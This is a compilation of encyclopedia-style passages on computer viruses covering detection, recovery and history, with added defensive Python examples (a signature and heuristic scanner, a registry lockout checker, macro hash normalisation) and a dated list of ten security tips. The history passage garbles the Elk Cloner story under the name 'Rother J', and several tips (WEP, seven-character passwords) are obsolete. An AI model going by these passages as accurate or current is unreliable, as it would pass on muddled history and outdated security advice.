Windows and Unix have similar scripting abilities, but while Unix natively blocks normal users from having access to make changes to the operating system environment, older copies of Windows such as Windows 95 and 98 do not. In 1997, when a virus for Linux was released – known as "Bliss" – leading antivirus vendors issued warnings that Unix-like systems could fall prey to viruses just like Windows. The Bliss virus may be considered characteristic of viruses – as opposed to worms – on Unix systems. Bliss requires that the user run it explicitly (so it is a trojan), and it can only infect programs that the user has the access to modify. Unlike Windows users, most Unix users do not log in as an administrator user except to install or configure software; as a result, even if a user ran the virus, it could not harm their operating system. The Bliss virus never became widespread, and remains chiefly a research curiosity. Its creator later posted the source code to Usenet, allowing researchers to see how it worked.

The role of software development:-
Because software is often designed with security features to prevent unauthorized use of system resources, many viruses must exploit software bugs in a system or application to spread. Software development strategies that produce large numbers of bugs will generally also produce potential exploits.

Anti-virus software and other preventive measures:-
Many users install anti-virus software that can detect and eliminate known viruses after the computer downloads or runs the executable. There are two common methods that an anti-virus software application uses to detect viruses. The first, and by far the most common method of virus detection is using a list of virus signature definitions. This works by examining the content of the computer's memory (its RAM, and boot sectors) and the files stored on fixed or removable drives (hard drives, floppy drives), and comparing those files against a database of known virus "signatures". The disadvantage of this detection method is that users are only protected from viruses that pre-date their last virus definition update. The second method is to use a heuristic algorithm to find viruses based on common behaviors. This method has the ability to detect viruses that anti-virus security firms have yet to create a signature for.
Some anti-virus programs are able to scan opened files in addition to sent and received e-mails 'on the fly' in a similar manner. This practice is known as "on-access scanning." Anti-virus software does not change the underlying capability of host software to transmit viruses. Users must update their software regularly to patch security holes. Anti-virus software also needs to be regularly updated in order to prevent the latest threats.
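The two detection methods described above, side by side, as an added example that is not taken from any anti-virus product. The signature bytes, trait strings, weights and sample buffers are all constructed, and static string traits stand in for observed behaviour.

```python
from dataclasses import dataclass
from typing import Optional

# Signature database: name -> byte pattern of a known sample (constructed values).
SIGNATURES = {
    "Demo.A": bytes.fromhex("deadbeef4141"),
    "Demo.B": b"DEMO-MARKER-B",
}

# Heuristic traits and weights (assumptions): strings that hint at auto-start
# registration, tool lockout or removable-media spreading.
HEURISTIC_TRAITS = {
    b"CurrentVersion\\Run": 2,
    b"DisableTaskMgr": 3,
    b"autorun.inf": 2,
}
HEURISTIC_THRESHOLD = 4

@dataclass
class Verdict:
    signature: Optional[str]  # name of the matching signature, if any
    score: int                # sum of the heuristic weights that fired

    @property
    def suspicious(self) -> bool:
        return self.signature is not None or self.score >= HEURISTIC_THRESHOLD

def scan(data: bytes) -> Verdict:
    """Check a buffer against the signature list, then score heuristic traits."""
    signature = next((n for n, pat in SIGNATURES.items() if pat in data), None)
    score = sum(w for trait, w in HEURISTIC_TRAITS.items() if trait in data)
    return Verdict(signature, score)

# Constructed buffers: a known sample, an unknown variant, a harmless file.
KNOWN = b"MZ" + b"\x90" * 4 + SIGNATURES["Demo.A"] + b"rest of file"
NEW_VARIANT = (b"MZ" + b"\x00" * 8
               + b"Software\\Microsoft\\Windows\\CurrentVersion\\Run"
               + b"\x00DisableTaskMgr\x00")
BENIGN = b"MZ media helper that only reads autorun.inf"

if __name__ == "__main__":
    for name, buf in [("known", KNOWN), ("variant", NEW_VARIANT), ("benign", BENIGN)]:
        print(name, scan(buf), scan(buf).suspicious)
```

The variant has no entry in the signature list, so only the heuristic score flags it; the harmless file trips one trait but stays under the threshold.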
One may also prevent the damage done by viruses by making regular backups of data (and the Operating Systems) on different media, that are either kept unconnected to the system (most of the time), read-only or not accessible for other reasons, such as using different file systems. This way, if data is lost through a virus, one can start again using the backup (which should preferably be recent). If a backup session on optical media like CD and DVD is closed, it becomes read-only and can no longer be affected by a virus. Likewise, an Operating System on a bootable can be used to start the computer if the installed Operating Systems become unusable. Another method is to use different Operating Systems on different file systems. A virus is not likely to affect both. Data backups can also be put on different file systems. For example, Linux requires specific software to write to NTFS partitions, so if one does not install such software and uses a separate installation of MS Windows to make the backups on an NTFS partition, the backup should remain safe from any Linux viruses. Likewise, MS Windows can not read file systems like ext3, so if one normally uses MS Windows, the backups can be made on an ext3 partition using a Linux installation.

Recovery methods:-
Once a computer has been compromised by a virus, it is usually unsafe to continue using the same computer without completely reinstalling the operating system. However, a number of recovery options exist after a computer has a virus. Which of these actions applies depends on the type and severity of the virus.

Virus removal:-
One possibility on Windows XP and Windows Vista is a tool known as System Restore, which restores the registry and critical system files to a previous checkpoint. Often a virus will cause a system to hang, and a subsequent hard reboot will render a system restore point from the same day corrupt. Restore points from previous days should work provided the virus is not designed to corrupt the restore files. Some viruses, however, disable system restore and other important tools such as Task Manager and Command Prompt. An example of a virus that does this is CiaDoor.
Administrators have the option to disable such tools for limited users for various reasons. The virus modifies the registry to do the same, except that, even when the Administrator is controlling the computer, it blocks all users from accessing the tools. When an affected tool is started, it gives the message "Task Manager has been disabled by your administrator.", even if the user trying to open the program is the administrator.
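One way to check for the registry lockout described above, as an added example that is not from the original post: it reads the text of a registry export and reports policy values that disable Task Manager, Registry Editor, Command Prompt or System Restore. The policy value names are standard Windows settings that the page does not list itself, and the export text is constructed sample input.

```python
import re

# (subkey, value name), both lowercased -> the tool that a nonzero value disables.
# These are standard Windows policy values; the page itself does not list them.
TOOL_POLICIES = {
    (r"software\microsoft\windows\currentversion\policies\system", "disabletaskmgr"): "Task Manager",
    (r"software\microsoft\windows\currentversion\policies\system", "disableregistrytools"): "Registry Editor",
    (r"software\policies\microsoft\windows\system", "disablecmd"): "Command Prompt",
    (r"software\policies\microsoft\windows nt\systemrestore", "disablesr"): "System Restore",
}

# Constructed sample in .reg export format (not taken from a real machine).
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
"DisableRegistryTools"=dword:00000000

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]
"DisableCMD"=dword:00000002

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore]
"DisableSR"=dword:00000001
"""

KEY_RE = re.compile(r"^\[(HKEY_[^\\\]]+)\\(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')

def disabled_tools(reg_text):
    """Return (tool, hive, value name, data) for every policy that blocks a tool."""
    findings, hive, subkey = [], None, None
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("["):
            m = KEY_RE.match(line)
            hive, subkey = (m.group(1), m.group(2).lower()) if m else (None, None)
            continue
        m = VALUE_RE.match(line)
        if m and subkey:
            tool = TOOL_POLICIES.get((subkey, m.group(1).lower()))
            data = int(m.group(2), 16)
            if tool and data != 0:
                findings.append((tool, hive, m.group(1), data))
    return findings

if __name__ == "__main__":
    for tool, hive, name, data in disabled_tools(SAMPLE_EXPORT):
        print(f"{tool} disabled: {hive} {name}={data}")
```

Registry Editor writes version 5.00 exports as UTF-16, so decode the file with that encoding before passing its text to `disabled_tools`.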
If your system is a Microsoft product and you have your 20 digit registration number, you can go to the Microsoft web site, and they will do a free scan and most likely remove any known virus such as Trojan win32.murlo.

Operating system reinstallation:-
Reinstalling the operating system is another approach to virus removal. It involves simply reformatting the OS partition and installing the OS from its original media, or imaging the partition with a clean backup image (taken with Ghost or Acronis for example).
This method has the benefits of being simple to do, often being faster than running multiple anti-virus scans, and being guaranteed to remove any malware. Downsides include having to reinstall all other software as well as the operating system. User data can be backed up by booting off of a LiveCD or putting the hard drive into another computer and booting from the other computer's operating system.

Computer Virus

Introduction:-
A computer virus is a computer program that can copy itself and infect a computer without permission or knowledge of the user. However, the term "virus" is commonly used, albeit erroneously, to refer to many different types of malware programs. The original virus may modify the copies, or the copies may modify themselves, as occurs in a metamorphic virus. A virus can only spread from one computer to another when its host is taken to the uninfected computer, for instance by a user sending it over a network or the Internet, or by carrying it on a removable medium such as a floppy disk, CD, or USB drive. Meanwhile viruses can spread to other computers by infecting files on a network file system or a file system that is accessed by another computer. Viruses are sometimes confused with computer worms and Trojan horses. A worm can spread itself to other computers without needing to be transferred as part of a host, and a Trojan horse is a file that appears harmless. Both worms and Trojans will cause harm to computers when executed.
Most personal computers are now connected to the Internet and to local area networks, facilitating the spread of malicious code. Today's viruses may also take advantage of network services such as the World Wide Web, e-mail, Instant Messaging and file sharing systems to spread, blurring the line between viruses and worms. Furthermore, some sources use an alternative terminology in which a virus is any form of self-replicating malware.
Some viruses are programmed to damage the computer by damaging programs, deleting files, or reformatting the hard disk. Others are not designed to do any damage, but simply replicate themselves and perhaps make their presence known by presenting text, video, or audio messages. Even these benign viruses can create problems for the computer user. They typically take up computer memory used by legitimate programs. As a result, they often cause erratic behavior and can result in system crashes. In addition, many viruses are bug-ridden, and these bugs may lead to system crashes and data loss.
History:-
The Creeper virus was first detected on ARPANET, the forerunner of the Internet, in the early 1970s. It propagated via the TENEX operating system and could make use of any connected modem to dial out to remote computers and infect them. It would display the message "I'M THE CREEPER : CATCH ME IF YOU CAN.". It is rumored that the Reaper program, which appeared shortly after and sought out copies of the Creeper and deleted them, may have been written by the creator of the Creeper in a fit of regret.
A program called "Rother J" is commonly credited with being the first computer virus to appear "in the wild", that is, outside the single computer or lab where it was created, but that claim is false. See the Timeline of notable computer viruses and worms for other earlier viruses. It was however the first virus to infect computers "in the home". Written in 1982 by Richard Skrenta, it attached itself to the Apple DOS 3.3 operating system and spread by floppy disk. This virus was originally a joke, created by a high school student and put onto a game. The disk could only be used 49 times. The game was set to play, but release the virus on the 50th time of starting the game. Only this time, instead of playing the game, it would change to a blank screen that read a message about the virus named Elk Cloner. The message that showed up on the screen is as follows:
"Elk Cloner: The program with a personality
It will get on all your disks
It will infiltrate your chips
Yes it's Cloner!
It will stick to you like glue
It will modify RAM too
Send in the Cloner!"
The computer would then be infected.
The first PC virus in the wild was a boot sector virus called Brain, created in 1986 by the Farooq Alvi Brothers, operating out of Lahore, Pakistan. The brothers reportedly created the virus to deter pirated copies of software they had written. However, analysts have claimed that the Ashar virus, a variant of Brain, possibly predated it based on code within the virus.
Before computer networks became widespread, most viruses spread on removable media, particularly floppy disks. In the early days of the personal computer, many users regularly exchanged information and programs on floppies. Some viruses spread by infecting programs stored on these disks, while others installed themselves into the disk boot sector, ensuring that they would be run when the user booted the computer from the disk.
Traditional computer viruses emerged in the 1980s, driven by the spread of personal computers and the resultant increase in BBS and modem use, and software sharing. Bulletin board driven software sharing contributed directly to the spread of Trojan horse programs, and viruses were written to infect popularly traded software. Shareware and bootleg software were equally common vectors for viruses on BBS's. Within the "pirate scene" of hobbyists trading illicit copies of retail software, traders in a hurry to obtain the latest applications and games were easy targets for viruses.
Since the mid-1990s, macro viruses have become common. Most of these viruses are written in the scripting languages for Microsoft programs such as Word and Excel. These viruses spread in Microsoft Office by infecting documents and spreadsheets. Since Word and Excel were also available for Mac OS, most of these viruses were able to spread on Macintosh computers as well. Most of these viruses did not have the ability to send infected e-mail. Those viruses which did spread through e-mail took advantage of the Microsoft Outlook COM interface.
Macro viruses pose unique problems for detection software. For example, some versions of Microsoft Word allowed macros to replicate themselves with additional blank lines. The virus behaved identically but would be misidentified as a new virus. In another example, if two macro viruses simultaneously infect a document, the combination of the two, if also self-replicating, can appear as a "mating" of the two and would likely be detected as a virus unique from the "parents".
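Both detection problems described above, reproduced as an added example that is not part of the original post: an exact hash misses a copy padded with blank lines, and hashing a doubly infected document as one blob reports an unknown virus, while normalized per-module hashing names both parents. The macro texts and detection names are constructed, harmless stand-ins.

```python
import hashlib

def normalize(source):
    """Drop blank lines and surrounding whitespace so padding cannot change the hash."""
    return "\n".join(ln.strip() for ln in source.splitlines() if ln.strip())

def sig(source, normalized=True):
    """SHA-256 of the macro text, optionally after normalization."""
    text = normalize(source) if normalized else source
    return hashlib.sha256(text.encode("utf-8")).hexdigest()

# Constructed, harmless stand-ins for two known macro modules.
PARENT_A = 'Sub AutoOpen()\n    MsgBox "constructed sample A"\nEnd Sub\n'
PARENT_B = 'Sub AutoClose()\n    MsgBox "constructed sample B"\nEnd Sub\n'

EXACT_DB = {sig(PARENT_A, False): "Demo.MacroA", sig(PARENT_B, False): "Demo.MacroB"}
NORMALIZED_DB = {sig(PARENT_A): "Demo.MacroA", sig(PARENT_B): "Demo.MacroB"}

def identify(modules, normalized=True):
    """Name each macro module separately; 'unknown' means no signature matched."""
    db = NORMALIZED_DB if normalized else EXACT_DB
    return [db.get(sig(m, normalized), "unknown") for m in modules]

def identify_whole_document(modules):
    """Hash all modules as one blob, the approach that reports a 'new' virus."""
    return NORMALIZED_DB.get(sig("\n".join(modules)), "unknown")

# Copy of A that picked up extra blank lines when it replicated.
PADDED_A = PARENT_A.replace("\n", "\n\n")
# One document carrying both known macros at once.
DOUBLE_INFECTED = [PADDED_A, PARENT_B]

if __name__ == "__main__":
    print("exact hash, padded copy:   ", identify([PADDED_A], normalized=False))
    print("normalized, padded copy:   ", identify([PADDED_A]))
    print("whole document, two macros:", identify_whole_document(DOUBLE_INFECTED))
    print("per module, two macros:    ", identify(DOUBLE_INFECTED))
```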
A virus may also send a web address link as an instant message to all the contacts on an infected machine. If the recipient, thinking the link is from a friend (a trusted source), follows the link to the website, the virus hosted at the site may be able to infect this new computer and continue propagating.
The newest species of the virus family is the cross-site scripting virus. The virus emerged from research and was academically demonstrated in 2005.[5] This virus utilizes cross-site scripting vulnerabilities to propagate. Since 2005 there have been multiple instances of cross-site scripting viruses in the wild; the most notable sites affected have been MySpace and Yahoo.

10 Fast and Free Security Enhancements

Before you spend a dime on security, there are many precautions you can take that will protect you against the most common threats.
1. Check Windows Update and Office Update regularly (_http://office.microsoft.com/productupdates); have your Office CD ready. Windows Me, 2000, and XP users can configure automatic updates. Click on the Automatic Updates tab in the System control panel and choose the appropriate options.
2. Install a personal firewall. Both SyGate (_www.sygate.com) and ZoneAlarm (_www.zonelabs.com) offer free versions.
3. Install a free spyware blocker. Our Editors' Choice ("Spyware," April 22) was SpyBot Search & Destroy (_http://security.kolla.de). SpyBot is also paranoid and ruthless in hunting out tracking cookies.
4. Block pop-up spam messages in Windows NT, 2000, or XP by disabling the Windows Messenger service (this is unrelated to the instant messaging program). Open Control Panel > Administrative Tools > Services and you'll see Messenger. Right-click and go to Properties. Set Start-up Type to Disabled and press the Stop button. Bye-bye, spam pop-ups! Any good firewall will also stop them.
5. Use strong passwords and change them periodically. Passwords should have at least seven characters; use letters and numbers and have at least one symbol. A decent example would be f8izKro@l. This will make it much harder for anyone to gain access to your accounts.
6. If you're using Outlook or Outlook Express, use the current version or one with the Outlook Security Update installed. The update and current versions patch numerous vulnerabilities.
7. Buy antivirus software and keep it up to date. If you're not willing to pay, try Grisoft AVG Free Edition (Grisoft Inc., w*w.grisoft.com). And double-check your AV with the free, online-only scanners available at w*w.pandasoftware.com/activescan and _http://housecall.trendmicro.com.
8. If you have a wireless network, turn on the security features: Use MAC filtering, turn off SSID broadcast, and even use WEP with the biggest key you can get. For more, check out our wireless section or see the expanded coverage in Your Unwired World in our next issue.
9. Join a respectable e-mail security list, such as the one found at our own Security Supersite at _http://security.ziffdavis.com, so that you learn about emerging threats quickly and can take proper precautions.
10. Be skeptical of things on the Internet. Don't assume that e-mail "From:" a particular person is actually from that person until you have further reason to believe it's that person. Don't assume that an attachment is what it says it is. Don't give out your password to anyone, even if that person claims to be from "support."